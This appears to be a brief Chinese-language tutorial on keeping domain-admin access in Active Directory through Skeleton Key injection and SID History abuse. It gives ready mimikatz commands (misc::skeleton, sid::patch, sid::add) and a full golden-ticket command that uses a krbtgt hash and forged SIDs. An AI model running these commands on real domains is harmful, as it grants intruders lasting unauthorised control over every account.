域权限维持(万能密码与SID History滥用)

Skeleton Key(万能密码)介绍

在获得了域管理员或企业管理员的情况下可以在目标域控的Lsass内存中
注入特定的密码,然后使用该密码来以任何用户身份进行登录,包括域管理员
或企业管理员,用户还可以使用之前的正常密码进行登录,这种攻击方式被称为
Skeleton Key(万能密码),设置Skeleton Key需要域管权限或者企业管理员权限,
因此被用作权限维持。

使用mimikatz进行万能密码利用

需要在域控上使用mimikatz进行万能密码利用命令:
privilege::debug
misc::skeleton
注入成功之后域控的Lsass进程中会给所有账号添加万能密码mimikatz,
使用可以以RDP或ipc$等方式连接。

在域控成功之后登录任意域成员机使用mimikatz作为密码即可登陆成功。	

SID History滥用简介

SIDHistory是一个为支持域迁移方案而设置的属性，当一个对象从一个域迁移到另一个域时，
会在新域创建一个新的SID作为该对象的objectSid，在之前域中的SID会添加到该对象的
sIDHistory属性中，此时该对象将保留在原来域的SID对应的访问权限。

SID History属性滥用(域控利用)

mimikatz命令:
	privilege::debug
	修复NTDS服务，否则无法将高权限的SID注入低权限用户的SID History属性
	sid::patch
	将域管理员administrator的SID添加到用户testSid2的slDHistory属性中
	sid::add /sam::testSid2 /new:administrator

成功设置后可以进行PTT或RDP登录等。

SID History属性滥用(krbtgt利用)

可以看成是黄金票据的一种拿到krbtgt之后将高权限用户的SID History添加到低权限的
用户中注入到内存进行Dcsync或进行远程登陆等,需要注意的是该操作并不会在域控的
ldap属性中添加上只会在攻击机的票据PAC中添加到高权限SID History。
利用步骤：
1.拿到krbtgt hash
	bdff817d8997011cb4405a615635143f
2.拿到高权限sid
	S-1-5-21-3042504039-1145428418-1324677547-512（Doamin Admins)
3.使用mimikatz进行攻击
sids:伪造SID
sid:域SID
testSid3普通域账号
mimikatz命令:
	kerberos::golden /user:testSid3 /sids:S-1-5-21-3042504039-1145428418-1324677547-512 /sid:S-1-5-21-3042504039-1145428418-1324677547 /domain:test.com /krbtgt:bdff817d8997011cb4405a615635143f /ptt

总结

本篇文章讲述了万能密码域SID History滥用这两种技术是较为
常见域内权限维持手段,这里注意介绍了mimikatz的利用方式。